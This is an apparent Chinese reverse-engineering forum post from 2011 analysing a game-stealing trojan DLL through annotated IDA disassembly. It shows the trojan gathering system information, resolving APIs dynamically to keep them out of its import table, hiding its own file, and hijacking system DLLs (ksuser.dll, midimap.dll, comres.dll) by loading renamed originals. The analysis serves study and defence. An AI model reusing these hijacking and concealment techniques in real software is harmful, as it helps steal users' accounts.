-
-
[原创]一款游戏木马的详细分析
-
发表于:
2011-12-7 22:17
11700
-
.text:10005B30 ; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
.text:10005B30 _DllMain@12 proc near ; CODE XREF: DllEntryPoint+4B#p
.text:10005B30
.text:10005B30 hinstDLL = dword ptr 4
.text:10005B30 fdwReason = dword ptr 8
.text:10005B30 lpvReserved = dword ptr 0Ch
.text:10005B30 cmp [esp+fdwReason], 1
.text:10005B35 jnz short loc_10005B73
.text:10005B37 mov eax, [esp+hinstDLL]
.text:10005B3B mov hModule, eax
.text:10005B40 call GetSystemInfo //得[B]到系统相关的信息,MAC地址,系统目录,加载进程[/B]
.text:10005B45 call IsLoadDll //[B]得到加载的名称[/B]..
.text:10005B4A call GetFunAddress_ //[B]导出一系列系统函数,不想在输入表出现[/B].
.text:10005B4F xor eax, eax
.text:10005B51 push eax
.text:10005B52 push eax
.text:10005B53 push eax
.text:10005B54 push offset sub_10005A7A //[B]线程处理函数,重要操作在这里[/B].
.text:10005B59 push eax
.text:10005B5A push eax
.text:10005B5B call CreateThread_
.text:10005B61 push eax ; hObject
.text:10005B62 call ds:CloseHandle
.text:10005B68 push offset FileName ; lpFileName
.text:10005B6D call sub_10004D09 //[B]将当前执行的DLL设置为系统隐藏属性[/B].
.text:10005B72 pop ecx
.text:10005B73
.text:10005B73 loc_10005B73: ; CODE XREF: DllMain(x,x,x)+5#j
.text:10005B73 push 1
.text:10005B75 pop eax
.text:10005B76 retn 0Ch
.text:10005B76 _DllMain@12 endp
.text:10005983 IsLoadDll proc near ; CODE XREF: DllMain(x,x,x)+15#p
.text:10005983
.text:10005983 var_C = dword ptr -0Ch
.text:10005983
.text:10005983 push esi
.text:10005984 push edi
.text:10005985 push offset FileName ; Str
.text:1000598A call str_str //字符串截断.
.text:1000598F mov esi, eax
.text:10005991 mov [esp+0Ch+var_C], offset aKsuser_dll ; "ksuser.dll"
.text:10005998 push esi ; Str1
.text:10005999 call strcmp //判断是不是 ksuser.dll
.text:1000599E pop ecx
.text:1000599F test eax, eax
.text:100059A1 pop ecx
.text:100059A2 jnz short loc_100059B0
.text:100059A4 push offset aYuksuser_dll ; "yuksuser.dll" //加载原有的dll.
.text:100059A9 mov edi, offset dword_1008FC80
.text:100059AE jmp short loc_100059E8 //跳过去.loadlibrary
.text:100059B0 ; ---------------------------------------------------------------------------
.text:100059B0
.text:100059B0 loc_100059B0: ; CODE XREF: IsLoadDll+1F#j
.text:100059B0 push offset aMidimap_dll ; "midimap.dll"
.text:100059B5 push esi ; Str1
.text:100059B6 call strcmp
.text:100059BB pop ecx
.text:100059BC test eax, eax
.text:100059BE pop ecx
.text:100059BF jnz short loc_100059CD
.text:100059C1 push offset aYumidimap_dll ; "yumidimap.dll"
.text:100059C6 mov edi, offset dword_1008FC84
.text:100059CB jmp short loc_100059E8
.text:100059CD ; ---------------------------------------------------------------------------
.text:100059CD
.text:100059CD loc_100059CD: ; CODE XREF: IsLoadDll+3C#j
.text:100059CD push offset aComres_dll ; "comres.dll"
.text:100059D2 push esi ; Str1
.text:100059D3 call strcmp
.text:100059D8 pop ecx
.text:100059D9 test eax, eax
.text:100059DB pop ecx
.text:100059DC jnz short loc_100059F9
.text:100059DE push offset aYucomres_dll ; "yucomres.dll"
.text:100059E3 mov edi, offset dword_1008FC88
.text:100059E8
.text:100059E8 loc_100059E8: ; CODE XREF: IsLoadDll+2B#j
.text:100059E8 ; IsLoadDll+48#j
.text:100059E8 push edi
.text:100059E9 call loadSameDll //加载原来的系统dll
.text:100059EE test eax, eax
.text:100059F0 jnz short loc_100059F9
.text:100059F2 push esi
.text:100059F3 push edi
.text:100059F4 call loadSameDll
.text:100059F9
.text:100059F9 loc_100059F9:
.text:100059F9
.text:100059F9 pop edi
.text:100059FA pop esi
.text:100059FB retn
.text:100059FB IsLoadDll endp
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
